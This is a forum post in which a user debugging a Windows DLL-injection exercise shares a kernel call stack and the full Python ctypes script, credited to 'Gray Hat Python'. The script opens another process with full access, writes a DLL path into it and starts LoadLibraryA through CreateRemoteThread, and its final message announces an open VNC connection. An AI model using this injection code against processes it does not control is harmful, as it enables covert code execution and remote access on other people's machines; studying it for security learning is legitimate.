Forum posts for ntkrnlpa.exe
Strange results while trying to inject a dll into a process via windll.kernel32.CreateRemote…
I am trying the following task:
1. inject a DLL into a process;
2. use windll.kernel32.CreateRemoteThread() through Python's ctypes module;
And I am encountering the following results:
1. the new thread is created successfully; but
2. I cannot grab this thread via WinDbg;
3. the call stack (grabbed via Process Explorer) is strange:
ntkrnlpa.exe!KiUnexpectedInterrupt+0x8d
ntkrnlpa.exe!PsDereferencePrimaryToken+0x362
ntkrnlpa.exe!KiDeliverApc+0xb3
ntkrnlpa.exe!ZwYieldExecution+0x19a4
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x29b56
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x2ac2b
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x2b20b
ntkrnlpa.exe!PsRemoveCreateThreadNotifyRoutine+0x11d
ntkrnlpa.exe!KiDispatchInterrupt+0x5a2
kernel32.dll!CreateThread+0x22
The code is from 'Gray Hat Python', and it's like this:
import sys
from ctypes import *

PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32
pid = sys.argv[1]
dll_path = sys.argv[2]
dll_len = len(dll_path)

# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )
if not h_process:
    print "[*] Couldn't acquire a handle to PID: %s" % pid
    sys.exit(0)

# Allocate some space for the DLL path
arg_address = kernel32.VirtualAllocEx( h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE)

# Write the DLL path into the allocated space
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))

# We need to resolve the address for LoadLibraryA
h_kernel32 = kernel32.GetModuleHandleA('kernel32.dll')
h_loadlib = kernel32.GetProcAddress(h_kernel32, 'LoadLibraryA')

# Now we try to create the remote thread, with the entry point set
# to LoadLibraryA and a pointer to the DLL path as its single parameter
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)):
    print '[*] Failed to inject the DLL. Exiting.'
    sys.exit(0)

print '[*] Remote thread successfully created with a thread ID of: 0x%08x' % thread_id.value
print '[*] VNC Connection now open and ready for action....'